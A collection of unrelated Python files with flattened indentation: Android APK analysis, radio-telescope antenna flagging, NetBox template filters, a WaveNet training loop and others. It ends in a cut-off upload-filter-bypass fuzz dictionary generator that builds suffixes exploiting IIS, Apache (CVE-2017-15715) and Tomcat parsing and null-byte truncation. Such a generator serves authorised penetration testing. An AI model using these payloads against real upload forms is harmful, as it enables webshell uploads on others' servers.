def __iter__(new_cls) -> Iterable:
return iter(new_cls._objects)
def clear(new_cls):
new_cls._objects.clear()
def __getitem__(new_cls, item):
for i in new_cls:
if item == i:
return i
raise IndexError(f"object with index ({item}) not found")
def __len__(new_cls):
return len(new_cls._objects)
|
'''
You will now make use of what you've learned from this chapter to solve a simple data extraction problem. You will also be introduced to a data structure, the pandas Series, in this exercise. We won't elaborate on it much here, but what you should know is that it is a data structure that you will be working with a lot of times when analyzing data from pandas DataFrames. You can think of DataFrame columns as single-dimension arrays called Series.
In this exercise, you will be using a list comprehension to extract the time from time-stamped Twitter data. The pandas package has been imported as pd and the file 'tweets.csv' has been imported as the df DataFrame for your use.
'''
# Extract the created_at column from df: tweet_time
tweet_time = df.created_at
# Extract the clock time: tweet_clock_time
tweet_clock_time = [entry[11:19] for entry in tweet_time]
# Print the extracted times
print(tweet_clock_time)
|
import logging
import os
import hashlib
from intent import Intent
class App(object):
"""
this class describes an app
"""
def __init__(self, app_path, output_dir=None):
"""
create a App instance
:param app_path: local file path of app
:return:
"""
assert app_path is not None
self.logger = logging.getLogger(self.__class__.__name__)
self.app_path = app_path
self.output_dir = output_dir
if output_dir is not None:
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
self.androguard = AndroguardAnalysis(self.app_path)
self.package_name = self.androguard.a.get_package()
self.main_activity = self.androguard.a.get_main_activity()
self.dumpsys_main_activity = None
self.possible_broadcasts = self.get_possible_broadcasts()
self.permissions = self.androguard.a.get_permissions()
self.activities = None
self.get_activities()
self.hashes = self.get_hashes()
def get_androguard_analysis(self):
"""
run static analysis of app
:return:get_adb().takeSnapshot(reconnect=True)
"""
if self.androguard is None:
self.androguard = AndroguardAnalysis(self.app_path)
return self.androguard
def get_package_name(self):
"""
get package name of current app
:return:
"""
if self.package_name is None:
self.package_name = self.get_androguard_analysis().a.get_package()
return self.package_name
def get_main_activity(self):
"""
get package name of current app
:return:
"""
if self.main_activity is None:
self.main_activity = self.get_androguard_analysis().a.get_main_activity()
if self.main_activity is not None:
return self.main_activity
else:
self.logger.warning("Cannot get main activity from manifest. Using dumpsys result instead.")
return self.dumpsys_main_activity
def get_activities(self):
"""
get all activities in the app, with the corresponding attributes
:return: a dict, each key is an activity name and the value is a dict of attributes
"""
if self.activities is None:
self.activities = {}
manifest = self.get_androguard_analysis().a.get_android_manifest_xml()
for activity_dom in manifest.getElementsByTagName("activity"):
activity_name = None
activity_attrs = {}
for key in activity_dom.attributes.keys():
attr = activity_dom.attributes.get(key)
activity_attrs[key] = attr.value
if key == "android:name":
activity_name = attr.value
self.activities[activity_name] = activity_attrs
return self.activities
def get_activity_launch_mode(self, activity):
"""
get launch mode of an activity
:param activity: the name of the activity
:return str
"""
activities = self.get_activities()
if activities is None:
return None
if activity in activities:
attributes = activities[activity]
if 'android:launchMode' in attributes:
return attributes['android:launchMode']
else:
return "standard"
else:
return None
def get_permissions(self):
"""
get package name of current app
:return:
"""
if self.permissions is None:
self.permissions = self.get_androguard_analysis().a.get_permissions()
return self.permissions
def get_start_intent(self):
"""
get an intent to start the app
:return: Intent
"""
package_name = self.get_package_name()
if self.get_main_activity():
package_name += "/%s" % self.get_main_activity()
return Intent(suffix=package_name)
def get_start_with_profiling_intent(self, trace_file, sampling=None):
"""
get an intent to start the app with profiling
:return: Intent
"""
package_name = self.get_package_name()
if self.get_main_activity():
package_name += "/%s" % self.get_main_activity()
if sampling is not None:
return Intent(prefix="start --start-profiler %s --sampling %d" % (trace_file, sampling), suffix=package_name)
else:
return Intent(prefix="start --start-profiler %s" % trace_file, suffix=package_name)
def get_stop_intent(self):
"""
get an intent to stop the app
:return: Intent
"""
package_name = self.get_package_name()
return Intent(prefix="force-stop", suffix=package_name)
def get_possible_broadcasts(self):
possible_broadcasts = set()
androguard_a = self.get_androguard_analysis().a
receivers = androguard_a.get_receivers()
for receiver in receivers:
intent_filters = androguard_a.get_intent_filters('receiver', receiver)
if 'action' in intent_filters:
actions = intent_filters['action']
else:
actions = []
if 'category' in intent_filters:
categories = intent_filters['category']
else:
categories = []
categories.append(None)
for action in actions:
for category in categories:
intent = Intent(prefix='broadcast', action=action, category=category)
possible_broadcasts.add(intent)
return possible_broadcasts
def get_hashes(self, block_size=2 ** 8):
"""
Calculate MD5,SHA-1, SHA-256
hashes of APK input file
@param block_size:
"""
md5 = hashlib.md5()
sha1 = hashlib.sha1()
sha256 = hashlib.sha256()
f = open(self.app_path, 'rb')
while True:
data = f.read(block_size)
if not data:
break
md5.update(data)
sha1.update(data)
sha256.update(data)
return [md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()]
class AndroguardAnalysis(object):
"""
analysis result of androguard
"""
def __init__(self, app_path):
"""
:param app_path: local file path of app, should not be None
analyse app specified by app_path
"""
self.app_path = app_path
from androguard.core.bytecodes.apk import APK
self.a = APK(app_path)
self.d = None
self.dx = None
def get_detailed_analysis(self):
from androguard.misc import AnalyzeDex
self.d, self.dx = AnalyzeDex(self.a.get_dex(), raw=True)
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2018 the HERA Project
# Licensed under the MIT License
import numpy
import optparse
from hera_cal import omni
from hera_qm import vis_metrics
from pyuvdata import UVData
import aipy as a
import sys
o = optparse.OptionParser()
o.set_usage("omni_run.py -C [calfile] [options] *.uvc")
a.scripting.add_standard_options(o, cal=True)
o.add_option('--frac', default=.3,
help='Fraction of total number of antennas to flag as bad and write out')
o.add_option('--write', action='store_true',
help='write out simple txt file of bad antennas/bls')
o.add_option('--ex_ants',
help='list of known bad antennas to exclude from metrics.')
opts, args = o.parse_args(sys.argv[1:])
# read in miriad file to get frequency info for aa
uv = a.miriad.UV(args[0])
fqs = a.cal.get_freqs(uv['sdf'], uv['sfreq'], uv['nchan'])
del(uv)
# create antenna array
aa = a.cal.get_aa(opts.cal, fqs)
info = omni.aa_to_info(aa) # we have no info here
reds = info.get_reds()
# parse ex_ants
ex_ants = []
if opts.ex_ants:
for ant in opts.ex_ants.split(','):
try:
ex_ants.append(int(ant))
except BaseException:
pass
for filename in args:
uvd = UVData()
uvd.read_miriad(filename)
if uvd.phase_type != 'drift':
uvd.unphase_to_drift()
data, flags = omni.UVData_to_dict([uvd])
bad_ants = metrics.check_ants(reds, data, skip_ants=ex_ants)
total_ba = ex_ants # start string with known bad ants
for ba in bad_ants:
# check if bad ants count is larger than some number of antennas.
if bad_ants[ba] > opts.frac * len(info.subsetant):
# check if antenna
if isinstance(ba[-1], str):
ret_ba = ba[0] # get antenna number of bad ant
# else it's a baseline. Don't support this now
else:
pass
total_ba.append(ret_ba)
if opts.write:
print 'Writing {0} to file'.format(total_ba)
writefile = open(filename + '.badants.txt', 'w')
writefile.write(','.join(map(str, total_ba)))
|
#%%
import re
#%%
r = r"[^a-z]*([y]o|[h']?ello)?"
re_greeting = re.compile(r,flags=re.IGNORECASE)
re_match = re_greeting.match(input())
print(re_match)
# %%
# %%
|
import datetime
import decimal
from typing import Dict, Any
from django import template
from django.conf import settings
from django.template.defaultfilters import date
from django.urls import NoReverseMatch, reverse
from django.utils import timezone
from django.utils.safestring import mark_safe
from utilities.forms import get_selected_values, TableConfigForm
from utilities.utils import get_viewname
register = template.Library()
#
# Filters
#
@register.filter()
def viewname(model, action):
"""
Return the view name for the given model and action. Does not perform any validation.
"""
return get_viewname(model, action)
@register.filter()
def validated_viewname(model, action):
"""
Return the view name for the given model and action if valid, or None if invalid.
"""
viewname = get_viewname(model, action)
# Validate the view name
try:
reverse(viewname)
return viewname
except NoReverseMatch:
return None
@register.filter()
def humanize_speed(speed):
"""
Humanize speeds given in Kbps. Examples:
1544 => "1.544 Mbps"
100000 => "100 Mbps"
10000000 => "10 Gbps"
"""
if not speed:
return ''
if speed >= 1000000000 and speed % 1000000000 == 0:
return '{} Tbps'.format(int(speed / 1000000000))
elif speed >= 1000000 and speed % 1000000 == 0:
return '{} Gbps'.format(int(speed / 1000000))
elif speed >= 1000 and speed % 1000 == 0:
return '{} Mbps'.format(int(speed / 1000))
elif speed >= 1000:
return '{} Mbps'.format(float(speed) / 1000)
else:
return '{} Kbps'.format(speed)
@register.filter()
def humanize_megabytes(mb):
"""
Express a number of megabytes in the most suitable unit (e.g. gigabytes or terabytes).
"""
if not mb:
return ''
if mb >= 1048576:
return f'{int(mb / 1048576)} TB'
if mb >= 1024:
return f'{int(mb / 1024)} GB'
return f'{mb} MB'
@register.filter()
def simplify_decimal(value):
"""
Return the simplest expression of a decimal value. Examples:
1.00 => '1'
1.20 => '1.2'
1.23 => '1.23'
"""
if type(value) is not decimal.Decimal:
return value
return str(value).rstrip('0').rstrip('.')
@register.filter(expects_localtime=True)
def annotated_date(date_value):
"""
Returns date as HTML span with short date format as the content and the
(long) date format as the title.
"""
if not date_value:
return ''
if type(date_value) == datetime.date:
long_ts = date(date_value, 'DATE_FORMAT')
short_ts = date(date_value, 'SHORT_DATE_FORMAT')
else:
long_ts = date(date_value, 'DATETIME_FORMAT')
short_ts = date(date_value, 'SHORT_DATETIME_FORMAT')
span = f'<span title="{long_ts}">{short_ts}</span>'
return mark_safe(span)
@register.simple_tag
def annotated_now():
"""
Returns the current date piped through the annotated_date filter.
"""
tzinfo = timezone.get_current_timezone() if settings.USE_TZ else None
return annotated_date(datetime.datetime.now(tz=tzinfo))
@register.filter()
def divide(x, y):
"""
Return x/y (rounded).
"""
if x is None or y is None:
return None
return round(x / y)
@register.filter()
def percentage(x, y):
"""
Return x/y as a percentage.
"""
if x is None or y is None:
return None
return round(x / y * 100)
@register.filter()
def get_docs_url(model):
"""
Return the documentation URL for the specified model.
"""
return f'{settings.STATIC_URL}docs/models/{model._meta.app_label}/{model._meta.model_name}/'
@register.filter()
def has_perms(user, permissions_list):
"""
Return True if the user has *all* permissions in the list.
"""
return user.has_perms(permissions_list)
@register.filter()
def as_range(n):
"""
Return a range of n items.
"""
try:
int(n)
except TypeError:
return list()
return range(n)
@register.filter()
def meters_to_feet(n):
"""
Convert a length from meters to feet.
"""
return float(n) * 3.28084
@register.filter("startswith")
def startswith(text: str, starts: str) -> bool:
"""
Template implementation of `str.startswith()`.
"""
if isinstance(text, str):
return text.startswith(starts)
return False
@register.filter
def get_key(value: Dict, arg: str) -> Any:
"""
Template implementation of `dict.get()`, for accessing dict values
by key when the key is not able to be used in a template. For
example, `{"ui.colormode": "dark"}`.
"""
return value.get(arg, None)
@register.filter
def get_item(value: object, attr: str) -> Any:
"""
Template implementation of `__getitem__`, for accessing the `__getitem__` method
of a class from a template.
"""
return value[attr]
@register.filter
def status_from_tag(tag: str = "info") -> str:
"""
Determine Bootstrap theme status/level from Django's Message.level_tag.
"""
status_map = {
'warning': 'warning',
'success': 'success',
'error': 'danger',
'debug': 'info',
'info': 'info',
}
return status_map.get(tag.lower(), 'info')
@register.filter
def icon_from_status(status: str = "info") -> str:
"""
Determine icon class name from Bootstrap theme status/level.
"""
icon_map = {
'warning': 'alert',
'success': 'check-circle',
'danger': 'alert',
'info': 'information',
}
return icon_map.get(status.lower(), 'information')
#
# Tags
#
@register.simple_tag()
def querystring(request, **kwargs):
"""
Append or update the page number in a querystring.
"""
querydict = request.GET.copy()
for k, v in kwargs.items():
if v is not None:
querydict[k] = str(v)
elif k in querydict:
querydict.pop(k)
querystring = querydict.urlencode(safe='/')
if querystring:
return '?' + querystring
else:
return ''
@register.inclusion_tag('helpers/utilization_graph.html')
def utilization_graph(utilization, warning_threshold=75, danger_threshold=90):
"""
Display a horizontal bar graph indicating a percentage of utilization.
"""
if utilization == 100:
bar_class = 'bg-secondary'
elif danger_threshold and utilization >= danger_threshold:
bar_class = 'bg-danger'
elif warning_threshold and utilization >= warning_threshold:
bar_class = 'bg-warning'
elif warning_threshold or danger_threshold:
bar_class = 'bg-success'
else:
bar_class = 'bg-gray'
return {
'utilization': utilization,
'bar_class': bar_class,
}
@register.inclusion_tag('helpers/table_config_form.html')
def table_config_form(table, table_name=None):
return {
'table_name': table_name or table.__class__.__name__,
'form': TableConfigForm(table=table),
}
@register.inclusion_tag('helpers/applied_filters.html')
def applied_filters(form, query_params):
"""
Display the active filters for a given filter form.
"""
form.is_valid()
applied_filters = []
for filter_name in form.changed_data:
if filter_name not in form.cleaned_data:
continue
querydict = query_params.copy()
if filter_name not in querydict:
continue
bound_field = form.fields[filter_name].get_bound_field(form, filter_name)
querydict.pop(filter_name)
display_value = ', '.join([str(v) for v in get_selected_values(form, filter_name)])
applied_filters.append({
'name': filter_name,
'value': form.cleaned_data[filter_name],
'link_url': f'?{querydict.urlencode()}',
'link_text': f'{bound_field.label}: {display_value}',
})
return {
'applied_filters': applied_filters,
}
|
from yeti.core.model.settings.setting import Setting
from yeti.core.errors import RuntimeException
class Vocabs(Setting):
"""This object interacts with vocabularies stored in Yeti.
Attributes:
name: Name of the Vocab setting
"""
name = 'vocabs'
def get_vocab(self, vocab_name):
"""Gets a specific vocab by name.
Args:
vocab_name: The name of the vocab to get.
Raises:
RuntimeException: When no vocab with that name is defined.
"""
if vocab_name not in self.settings:
raise RuntimeException('{0:s} is not a defined vocabulary'.format(
vocab_name))
return self.settings[vocab_name]
def set_vocab(self, vocab_name, vocab_list):
"""Sets the vocab list."""
self.settings[vocab_name] = vocab_list
self.save()
def add_value_to_vocab(self, vocab_name, value):
"""Adds a vocabulary item for a given vocab.
Args:
vocab_name: The name of the vocab to update.
"""
if not vocab_name in self.settings:
self.settings[vocab_name] = []
if value not in self.settings[vocab_name]:
self.settings[vocab_name].append(value)
self.save()
def remove_value_from_vocab(self, vocab_name, value):
"""Removes a value from a vocab.
Args:
vocab_name: The vocab from which to remove the value.
value: The value to remove.
Raises:
RuntimeException: A vocab is not defined or the vocab is not
in the vocab list.
"""
if vocab_name not in self.settings:
raise RuntimeException('{0:s} is not a defined vocabulary'.format(
vocab_name))
if value not in self.settings[vocab_name]:
raise RuntimeException('"{0:s}" not in vocab {1:s}'.format(
value, vocab_name))
self.settings[vocab_name].remove(value)
self.save()
def filter_values_vocab(self, vocab_name, value_filter):
"""Returns a filtered list of vocabulary items.
Args:
vocab_name: The name of the vocab to update.
value_filter: string to filter vocabs with.
"""
selected_values = []
for value in self.settings[vocab_name]:
if value_filter in value:
selected_values.append(value)
return selected_values
Setting.types[Vocabs.name] = Vocabs
|
# encoding: utf-8
"""
Copyright 2017 Brocade Communications Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from st2common.runners.base_action import Action
CONFIG_ITEMS = ['username', 'method']
class BaseConfig(Action):
"""This class loads the correct config environment for the run."""
def __init__(self, config):
"""Constructor for checking the environment."""
super(BaseConfig, self).__init__(config)
if config is None:
raise ValueError("No connection configuration details found")
if "environment" in config:
if config['environment'] is None:
raise ValueError("'environment' config defined but empty.")
else:
pass
else:
for item in CONFIG_ITEMS:
if item in config:
pass
else:
raise KeyError("Config.yaml Mising: %s" % (item))
def _set_config(self, environment):
if environment and environment in self.config['environment']:
group_config = self.config['environment'].get(environment)
for item in CONFIG_ITEMS:
if item in group_config:
pass
else:
raise KeyError("Config.yaml Mising: environment key:%s:%s"
% (environment, item))
else:
group_config = self.config['environment'].get('default')
try:
self.method = group_config['method']
self.method = self.method.encode('utf-8', 'ignore')
self.username = group_config['username']
self.username = self.username.encode('utf-8', 'ignore')
if 'password' in group_config and group_config['password'] is not None:
self.password = group_config['password']
self.password = self.password.encode('utf-8', 'ignore')
else:
self.password = ""
if 'enable' in group_config and group_config['enable'] is not None:
self.enable = group_config['enable']
self.enable = self.enable.encode('utf-8', 'ignore')
else:
self.enable = ""
if 'b64password' in group_config and \
group_config['b64password'] is not None:
self.b64password = group_config['b64password']
self.b64password = self.b64password.encode('utf-8', 'ignore')
else:
self.b64password = ""
if 'b64enable' in group_config and group_config['b64enable'] is not None:
self.b64enable = group_config['b64enable']
self.b64enable = self.b64enable.encode('utf-8', 'ignore')
else:
self.b64enable = ""
if 'port' in group_config:
self.port = group_config['port']
else:
self.port = None
except Exception as e:
raise Exception(e)
|
# Copyright 2004-2008 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
"""
contains enumeration of all compilers supported by the project
"""
GCC_XML_06 = "GCC-XML 0.6"
GCC_XML_07 = "GCC-XML 0.7"
GCC_XML_09 = "GCC-XML 0.9"
GCC_XML_09_BUGGY = "GCC-XML 0.9 BUGGY"
#revision 122:
#After this fix, all constructors and destructors that exist for a class
#are dumped whether the user declared them or not. Those that were
#implicitly declared by the compiler are marked as "artificial".
MSVC_PDB_9 = "MSVC PDB 9.0"
def on_missing_functionality( compiler, functionality ):
raise NotImplementedError( '"%s" compiler doesn\'t support functionality "%s"'
% ( compiler, functionality ))
|
# *****************************************************************************
# Copyright (c) 2018, NVIDIA CORPORATION.
# Copyright (c) 2019, Hubert Siuzdak
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the NVIDIA CORPORATION nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# *****************************************************************************
import argparse
import json
import logging
import os
import random
import torch
from torch.utils.data import DataLoader
from loader import Loader
from model import Model
from utils import to_gpu
logging.basicConfig(level=logging.INFO)
class CrossEntropyLoss(torch.nn.Module):
def __init__(self):
super(CrossEntropyLoss, self).__init__()
self.num_classes = model_config["n_out_channels"]
def forward(self, inputs, targets):
"""
inputs are batch by num_classes by sample
targets are batch by sample
torch CrossEntropyLoss needs
input = batch * samples by num_classes
targets = batch * samples
"""
targets = targets.view(-1)
inputs = inputs.transpose(1, 2)
inputs = inputs.contiguous()
inputs = inputs.view(-1, self.num_classes)
return torch.nn.CrossEntropyLoss()(inputs, targets)
def load_checkpoint(checkpoint_path, model, optimizer):
assert os.path.isfile(checkpoint_path)
checkpoint_dict = torch.load(checkpoint_path, map_location='cpu')
iteration = checkpoint_dict['iteration']
optimizer.load_state_dict(checkpoint_dict['optimizer'])
model_for_loading = checkpoint_dict['model']
model.load_state_dict(model_for_loading.state_dict())
print("Loaded checkpoint '{}' (iteration {})".format(checkpoint_path, iteration))
return model, optimizer, iteration
def save_checkpoint(model, optimizer, learning_rate, iteration, filepath):
print("Saving model and optimizer state at iteration {} to {}".format(
iteration, filepath))
model_for_saving = Model(model_config).cuda()
model_for_saving.load_state_dict(model.state_dict())
torch.save({'model': model_for_saving,
'iteration': iteration,
'optimizer': optimizer.state_dict(),
'learning_rate': learning_rate}, filepath)
def cycle(iterable):
while True:
for x in iterable:
yield x
def train(output_directory, epochs, learning_rate, alpha, iters_per_checkpoint, num_workers, batch_size, pin_memory,
seed, checkpoint_path):
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
criterion = CrossEntropyLoss()
domain_loss_criterion = torch.nn.NLLLoss()
model = Model(model_config).cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# Load checkpoint if one exists
iteration = 1
if checkpoint_path != "":
model, optimizer, iteration = load_checkpoint(checkpoint_path, model, optimizer)
iteration += 1 # next iteration is iteration + 1
train_files = ["train_files_{}.txt".format(i) for i in range(model_config["n_speakers"])]
trainsets = [Loader(file, i, **data_config) for i, file in enumerate(train_files)]
train_loaders = [DataLoader(trainset, num_workers=num_workers, batch_size=batch_size, shuffle=True, sampler=None,
pin_memory=pin_memory, drop_last=True) for trainset in trainsets]
lengths = [len(i) for i in train_loaders]
# Get output_directory ready
if not os.path.isdir(output_directory):
os.makedirs(output_directory)
os.chmod(output_directory, 0o775)
print("output directory", output_directory)
model.train()
epoch_offset = max(0, int(iteration / max(lengths))) + 1
iterators = [iter(cycle(loader)) for loader in train_loaders]
# ================ MAIN TRAINING LOOP! ===================
reduced_recon_loss = 0.0
reduced_domain_loss = 0.0
for epoch in range(epoch_offset, epochs):
print("Epoch: {}".format(epoch))
for _ in range(max(lengths)):
random.shuffle(iterators)
for iterator in iterators:
model.zero_grad()
audio, decoder_ind = next(iterator)
audio = to_gpu(audio)
audio_pred, domain_output = model(audio, decoder_ind[0], alpha)
domain_loss = domain_loss_criterion(domain_output, decoder_ind.long().cuda())
recon_loss = criterion(audio_pred, audio)
loss = recon_loss + domain_loss
reduced_recon_loss += recon_loss.item()
reduced_domain_loss += domain_loss.item()
loss.backward()
optimizer.step()
print("{}:\trecon_loss: {:.9f} \t domain_loss: {:.9f}".format(iteration, recon_loss.item(),
domain_loss.item()))
if (iteration % 100 == 0):
print("\navg_recon_loss: {:.9f}\tavg_domain_loss: {:.9f}\n".format(reduced_recon_loss / 100,
reduced_domain_loss / 100))
reduced_recon_loss = 0.0
reduced_domain_loss = 0.0
if (iteration % iters_per_checkpoint == 0):
checkpoint_path = "{}/wavenet_{}".format(
output_directory, iteration)
save_checkpoint(model, optimizer, learning_rate, iteration,
checkpoint_path)
iteration += 1
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--config', type=str,
help='JSON file for configuration')
args = parser.parse_args()
# Parse configs. Globals nicer in this case
with open(args.config) as f:
data = f.read()
config = json.loads(data)
train_config = config["train_config"]
global data_config
data_config = config["data_config"]
global model_config
model_config = config["model_config"]
if torch.cuda.device_count() > 1:
print("WARNING: Multiple GPUs detected but no distributed group set")
print("Only running 1 GPU.")
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = False
train(**train_config)
|
#coding=utf-8
'''
author: c0ny1<root@gv7.me>
github: https://github.com/c0ny1/upload-fuzz-dic-builder
date: 2018-11-04 23:16
description: 生成符合漏洞实际场景fuzz字典的脚本
'''
import argparse
import copy
import urllib
## 各类语言可解析的后缀
html_parse_suffix = ['html','htm','phtml','pht','Html','Htm','pHtml']
asp_parse_suffix = ['asp','aspx','asa','asax','ascx','ashx','asmx','cer','aSp','aSpx','aSa','aSax','aScx','aShx','aSmx','cEr']
php_parse_suffix = ['php','php5','php4','php3','php2','pHp','pHp5','pHp4','pHp3','pHp2']
jsp_parse_suffix = ['jsp','jspa','jspx','jsw','jsv','jspf','jtml','jSp','jSpx','jSpa','jSw','jSv','jSpf','jHtml']
## web中间件解析漏洞
def iis_suffix_creater(suffix):
res = []
for l in suffix:
str ='%s;.%s' % (l,allow_suffix)
res.append(str)
return res
def apache_suffix_creater(suffix):
res = []
for l in suffix:
str = '%s.xxx' % l
res.append(str)
str = '%s%s' % (l,urllib.unquote('%0a')) #CVE-2017-15715
res.append(str)
return res
win_tomcat = ['%20','::$DATA','/']
def tomcat_suffix_creater(suffix):
res = []
for l in suffix:
for t in win_tomcat:
str = '%s%s' % (l,t)
res.append(str)
return res
## 系统特性
def str_81_to_ff():
res = []
for i in range(129,256):
str = '%x' % i
str = '%' + str
str = urllib.unquote(str)
res.append(str)
return res
windows_os = [' ','.','/','::$DATA','<','>','>>>','%20','%00'] + str_81_to_ff()
def windows_suffix_creater(suffix):
res = []
for s in suffix:
for w in windows_os:
str = '%s%s' % (s,w)
res.append(str)
return res
## 脚本语言漏洞(00截断)
def str_00_truncation(suffix,allow_suffix):
res = []
for i in suffix:
str = '%s%s.%s' % (i,'%00',allow_suffix)
res.append(str)
str = '%s%s.%s' % (i,urllib.unquote('%00'),allow_suffix)
res.append(str)
return res
## 返回字符串所有大写可能
def str_case_mixing(word):
str_list = []
word = word.lower()
tempWord = copy.deepcopy(word)
plist = []
redict = {}
for char in range( len( tempWord ) ):
char = word[char]
plist.append(char)
num = len( plist )
for i in range( num ):
for j in range( i , num + 1 ):
sContent = ''.join( plist[0:i] )
mContent = ''.join( plist[i:j] )
mContent = mContent.upper()
eContent = ''.join( plist[j:] )
content = '''%s%s%s''' % (sContent,mContent,eContent)
redict[content] = None
for i in redict.keys():
str_list.append(i)
return str_list
## list大小写混合
def list_case_mixing(li):
res = []
for l in li:
res += str_case_mixing(l)
return res
## 双后缀生成
def str_double_suffix_creater(suffix):
res = []
for i in range(1,len(suffix)):
str = list(suffix)
str.insert(i,suffix)
res.append("".join(str))
return res
def list_double_suffix_creater(list_suffix):
res = []
for l in list_suffix:
res += str_double_suffix_creater(l)
return duplicate_removal(res)
#list 去重
def duplicate_removal(li):
return list(set(li))
#list 去空行
def clear_list(li):
rmstr = ['',' ',None]
for l in li:
for r in rmstr:
if l == r:
li.remove(r)
return li
def parse_args():
parser = argparse.ArgumentParser(prog='upload-fuzz-dic-builder',
formatter_class=argparse.RawTextHelpFormatter,
description='')
parser.add_argument('-n','--upload-filename',metavar='',dest='upload_file_name', type=str, default='test',
help=u'Upload file name')
parser.add_argument('-a','--allow-suffix',metavar='',dest='allow_suffix', type=str, default='jpg',
help=u'Allowable upload suffix')
parser.add_argument('-l','--language',metavar='',dest='language',choices=['asp','php','jsp','all'], type=str, default='all',
help='Uploaded script language')
parser.add_argument('-m','--middleware',metavar='',dest='middleware',choices=['iis','apache','tomcat','all'],type=str, default='all',
help='Middleware used in Web System')
parser.add_argument('--os',metavar='',dest='os', choices=['win','linux','all'],type=str, default='all',
help='Target operating system type')
parser.add_argument('-d','--double-suffix',dest='double_suffix', default=False,action='store_true',
help='Is it possible to generate double suffix?')
parser.add_argument('-o','--output',metavar='',dest='output_filename', type=str, default='upload_fuzz_dic.txt',
help='Output file')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
upload_file_name = args.upload_file_name
allow_suffix = args.allow_suffix
output_filename =args.output_filename
language = args.language
middleware = args.middleware
os = args.os
double_suffix =args.double_suffix
if middleware == 'iis':
os = 'win'
###################################
f = open(output_filename,'w')
parse_suffix = []
case_parse_suffix = []
middleware_parse_suffix = []
htaccess_suffix = []
os_parse_suffix = []
double_parse_suffix = []
# 可解析后缀
if language == 'asp':
html_parse_suffix = []
php_parse_suffix = []
jsp_parse_suffix = []
parse_suffix = asp_parse_suffix
elif language == 'php':
asp_parse_suffix = []
jsp_parse_suffix = []
parse_suffix = html_parse_suffix + php_parse_suffix
elif language == 'jsp':
html_parse_suffix = []
asp_parse_suffix = []
php_parse_suffix = []
parse_suffix = jsp_parse_suffix
else: # language == 'all'
parse_suffix = html_parse_suffix + asp_parse_suffix + php_parse_suffix + jsp_parse_suffix
print u'[+] 收集%d条可解析后缀完毕!' % len(parse_suffix)
# 可解析后缀 + 大小写混合
if os == 'win' or os == 'all':
case_html_parse_suffix = list_case_mixing(html_parse_suffix)
case_asp_parse_suffix = list_case_mixing(asp_parse_suffix)
case_php_parse_suffix = list_case_mixing(php_parse_suffix)
case_jsp_parse_suffix = list_case_mixing(jsp_parse_suffix)
case_parse_suffix = list_case_mixing(parse_suffix)
print u'[+] 加入%d条可解析后缀大小写混合完毕!' % len(case_parse_suffix)
else: # os == 'linux'
case_html_parse_suffix = html_parse_suffix
case_asp_parse_suffix = asp_parse_suffix
case_php_parse_suffix = php_parse_suffix
case_jsp_parse_suffix = jsp_parse_suffix
case_parse_suffix = parse_suffix
# 中间件漏洞
if middleware == 'iis':
case_asp_php_jsp_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_jsp_parse_suffix
middleware_parse_suffix = iis_suffix_creater(case_asp_php_jsp_parse_suffix)
elif middleware == 'apache':
case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
middleware_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
elif middleware == 'tomcat' and os == 'linux':
middleware_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
elif middleware == 'tomcat' and (os == 'win' or os == 'all'):
case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
middleware_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
else:
case_asp_php_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix
iis_parse_suffix = iis_suffix_creater(case_asp_php_parse_suffix)
case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
apache_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
tomcat_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
middleware_parse_suffix = iis_parse_suffix + apache_parse_suffix + tomcat_parse_suffix
middleware_parse_suffix = duplicate_removal(middleware_parse_suffix)
